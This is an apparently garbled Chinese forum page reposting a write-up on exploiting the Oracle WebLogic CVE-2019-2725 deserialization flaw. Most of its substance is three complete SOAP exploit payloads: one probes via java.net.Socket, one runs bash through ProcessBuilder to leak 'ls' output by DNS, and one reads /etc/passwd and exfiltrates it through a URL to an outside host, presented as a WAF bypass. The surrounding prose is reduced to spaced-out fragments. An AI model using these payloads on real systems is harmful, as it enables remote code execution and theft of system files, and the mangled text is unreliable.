搜索

[2255] 2021-01-29_weblogic远程代码执行(利用CVE-2019-2725)

文档创建者:s7ckTeam
浏览次数:42
最后更新:2025-01-16
2021-01-29_weblogic远程代码执行(利用CVE-2019-2725) w e b l o g i c C V E - 2 0 1 9 - 2 7 2 5 M A H M O U D   G A M A L   E D I   2 0 2 1 - 0 1 - 2 9 P a r t   0 1 T L ; D R C V E - 2 0 1 9 - 2 7 2 5 P a r t   0 2 w e b l o g i c O r a c l e   W e b L o g i c   S e r v e r O r a c l e   C o r p o r a t i o n J a v a   E E O r a c l e 2 0 0 8 B E A   S y s t e m s W e b L o g i c   S e r v e r W i k i p e d i a P a r t   0 3 C V E - 2 0 1 9 - 2 7 2 5 2 0 1 9 4 2 5 O r a c l e   W e b L o g i c w l s 9 _ a s y n c _ r e s p o n s e . w a r w l s - w s a t . w a r W e b L o g i c 1 0 . X 1 2 . 1 . 3 J a v a   X M L   b e a n S O A P e n d p o i n t / _ a s y n c / A s y n c R e s p o n s e S e r v i c e P a r t   0 4 w e b l o g i c w e b l o g i c   C V E / _ a s y n c / A s y n c R e s p o n s e S e r v i c e C V E - 2 0 1 9 - 2 7 2 5 e n d p o i n t     j a v a . n e t . S o c k e t 使 p a y l o a d
W A F X M L p a y l o a d W A F W A F 2 0 2 e n d p o i n t 8 0 n e t c a t D N S D N S D N S r c e t e s t . t e s t . z o m b i e h e l p 5 4 . m e   j a v a . n e t . S o c k e t o r g . s l f 4 j . e x t . E v e n t D a t a p a y l o a d o r g . s l f 4 j . e x t . E v e n t D a t a p a y l o a d < s o a p e n v : E n v e l o p e   x m l n s : s o a p e n v = " h t t p : / / s c h e m a s . x m l s o a p . o r g / s o a p / e n v e l o p e / "   x m l n s : w s a = " h t t p : / / w w w . w 3 . o r g / 2 0 0 5 / 0 8 / a d d r e s s i n g "   x m l n s : a s y = " h t t p : / / w w w . b e a . c o m / a s y n c / A s y n c R e s p o n s e S e r v i c e " >       < s o a p e n v : H e a d e r >   < w s a : A c t i o n > d e m o < / w s a : A c t i o n > < w s a : R e l a t e s T o > t e s t < / w s a : R e l a t e s T o > < w o r k : W o r k C o n t e x t   x m l n s : w o r k = " h t t p : / / b e a . c o m / 2 0 0 4 / 0 6 / s o a p / w o r k a r e a / " > < j a v a >         < c l a s s >                 < s t r i n g > j a v a . n e t . S o c k e t < / s t r i n g >                 < v o i d >                         < s t r i n g > r c e t e s t . t e s t . z o m b i e h e l p 5 4 . m e < / s t r i n g >                         < i n t > 8 0 < / i n t >                 < / v o i d >         < / c l a s s > < / j a v a > < / w o r k : W o r k C o n t e x t >       < / s o a p e n v : H e a d e r >       < s o a p e n v : B o d y >             < a s y : o n A s y n c D e l i v e r y / >       < / s o a p e n v : B o d y > < / s o a p e n v : E n v e l o p e >
X M L o r g . s l f 4 j . e x t . E v e n t D a t a X M L   b e a n j a v a . l a n g . P r o c e s s B u i l d e r   s t a r t ( ) < s o a p e n v : E n v e l o p e   x m l n s : s o a p e n v = " h t t p : / / s c h e m a s . x m l s o a p . o r g / s o a p / e n v e l o p e / "   x m l n s : w s a = " h t t p : / / w w w . w 3 . o r g / 2 0 0 5 / 0 8 / a d d r e s s i n g "   x m l n s : a s y = " h t t p : / / w w w . b e a . c o m / a s y n c / A s y n c R e s p o n s e S e r v i c e " >       < s o a p e n v : H e a d e r >   < w s a : A c t i o n > d e m o < / w s a : A c t i o n > < w s a : R e l a t e s T o > t e s t < / w s a : R e l a t e s T o > < w o r k : W o r k C o n t e x t   x m l n s : w o r k = " h t t p : / / b e a . c o m / 2 0 0 4 / 0 6 / s o a p / w o r k a r e a / " > < j a v a >         < c l a s s >                 < s t r i n g > o r g . s l f 4 j . e x t . E v e n t D a t a < / s t r i n g >                 < v o i d >                         < s t r i n g >                                 < ! [ C D A T A [ < j a v a   v e r s i o n = " 1 . 8 "   c l a s s = " j a v a . b e a n s . X M L D e c o d e r " >                                         < v o i d   c l a s s = " j a v a . l a n g . P r o c e s s B u i l d e r " >                                                 < a r r a y   c l a s s = " j a v a . l a n g . S t r i n g "   l e n g t h = " 3 " >                                                         < v o i d   i n d e x = " 0 " >                                                                 < s t r i n g > / b i n / b a s h < / s t r i n g >                                                         < / v o i d >                                                         < v o i d   i n d e x = " 1 " >                                                                 < s t r i n g > - c < / s t r i n g >                                                         < / v o i d >                                                         < v o i d   i n d e x = " 2 " >                                                                 < s t r i n g > p i n g   " ` l s   |   h e a d   - n   1 ` . h a c k . z o m b i e h e l p 5 4 . m e " < / s t r i n g >                                                         < / v o i d >                                                 < / a r r a y >                                                 < v o i d   m e t h o d = " s t a r t "   / > < / v o i d >                                 < / j a v a > ] ] >                         < / s t r i n g >                 < / v o i d >         < / c l a s s > < / j a v a > < / w o r k : W o r k C o n t e x t >   < / s o a p e n v : H e a d e r >   < s o a p e n v : B o d y >   < a s y : o n A s y n c D e l i v e r y / >   < / s o a p e n v : B o d y > < / s o a p e n v : E n v e l o p e > p i n g   " ` l s   |   h e a d   - n   1 ` . h a c k . z o m b i e h e l p 5 4 . m e "
D N S l s 使 W A F 访 j a v a . l a n g . P r o c e s s B u i l d e r j a v a . l a n g . R u n t i m e j a v a . b e a n s . X M L D e c o d e r J a v a X M L   b e a n   / e t c / p a s s w d D N S p i n g   " ` l s   |   h e a d   - n   1 ` . h a c k . z o m b i e h e l p 5 4 . m e " < s o a p e n v : E n v e l o p e   x m l n s : s o a p e n v = " h t t p : / / s c h e m a s . x m l s o a p . o r g / s o a p / e n v e l o p e / "   x m l n s : w s a = " h t t p : / / w w w . w 3 . o r g / 2 0 0 5 / 0 8 / a d d r e s s i n g "   x m l n s : a s y = " h t t p : / / w w w . b e a . c o m / a s y n c / A s y n c R e s p o n s e S e r v i c e " >       < s o a p e n v : H e a d e r >   < w s a : A c t i o n > d e m o < / w s a : A c t i o n > < w s a : R e l a t e s T o > t e s t < / w s a : R e l a t e s T o > < w o r k : W o r k C o n t e x t   x m l n s : w o r k = " h t t p : / / b e a . c o m / 2 0 0 4 / 0 6 / s o a p / w o r k a r e a / " > < j a v a >         < c l a s s >                 < s t r i n g > o r g . s l f 4 j . e x t . E v e n t D a t a < / s t r i n g >                 < v o i d >                         < s t r i n g > < ! [ C D A T A [                                 < j a v a >                                         < o b j e c t   i d = " f i l e "   c l a s s = " j a v a . i o . F i l e R e a d e r " >                                                 < s t r i n g > / e t c / p a s s w d < / s t r i n g >                                         < / o b j e c t >                                         < o b j e c t   i d = " t e x t "   c l a s s = " j a v a . i o . B u f f e r e d R e a d e r " >                                                 < o b j e c t   i d r e f = " f i l e "   / >                                                 < v o i d   i d = " r e s "   m e t h o d = " r e a d L i n e " / >                                         < / o b j e c t >                                         < o b j e c t   i d r e f = " r e s " >                                                 < v o i d   i d = " r e s 2 "   m e t h o d = " r e p l a c e " >                                                         < s t r i n g > : < / s t r i n g >                                                         < s t r i n g > - < / s t r i n g >
                                                        < s t r i n g > - < / s t r i n g >                                                 < / v o i d >                                         < / o b j e c t >                                         < o b j e c t   i d r e f = " r e s 2 " >                                                 < v o i d   i d = " r e s 3 "   m e t h o d = " r e p l a c e " >                                                         < s t r i n g > / < / s t r i n g >                                                         < s t r i n g > - < / s t r i n g >                                                 < / v o i d >                                         < / o b j e c t >                                         < o b j e c t   i d = " z h p "   c l a s s = " j a v a . l a n g . S t r i n g " >                                                 < s t r i n g > h t t p : / / < / s t r i n g >                                         < / o b j e c t >                                         < o b j e c t   i d r e f = " z h p " >                                                 < v o i d   i d = " r e s 4 "   m e t h o d = " c o n c a t "   >                                                         < o b j e c t   i d r e f = " r e s 3 "   / >                                                 < / v o i d >                                         < / o b j e c t >                                         < o b j e c t   i d r e f = " r e s 4 " >                                                 < v o i d   i d = " r e s 5 "   m e t h o d = " c o n c a t "   >                                                         < s t r i n g > . h a c k . z o m b i e h e l p 5 4 . m e < / s t r i n g >                                                 < / v o i d >                                         < / o b j e c t >                                         < o b j e c t   i d = " u r l "   c l a s s = " j a v a . n e t . U R L " >                                                 < o b j e c t   i d r e f = " r e s 5 "   / > < / o b j e c t >                                         < o b j e c t   i d r e f = " u r l " >                                                 < v o i d   i d = " c o n n e c t i o n "   m e t h o d = " o p e n C o n n e c t i o n "   / >                                         < / o b j e c t >                                         < o b j e c t   i d r e f = " c o n n e c t i o n " >                                                 < v o i d   i d = " i n p u t S t r e a m "   m e t h o d = " g e t I n p u t S t r e a m " / >                                         < / o b j e c t >                                 < / j a v a >                         ] ] > < / s t r i n g >                 < / v o i d >         < / c l a s s > < / j a v a > < / w o r k : W o r k C o n t e x t >   < / s o a p e n v : H e a d e r >   < s o a p e n v : B o d y >   < a s y : o n A s y n c D e l i v e r y / >   < / s o a p e n v : B o d y > < / s o a p e n v : E n v e l o p e >
E D I
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理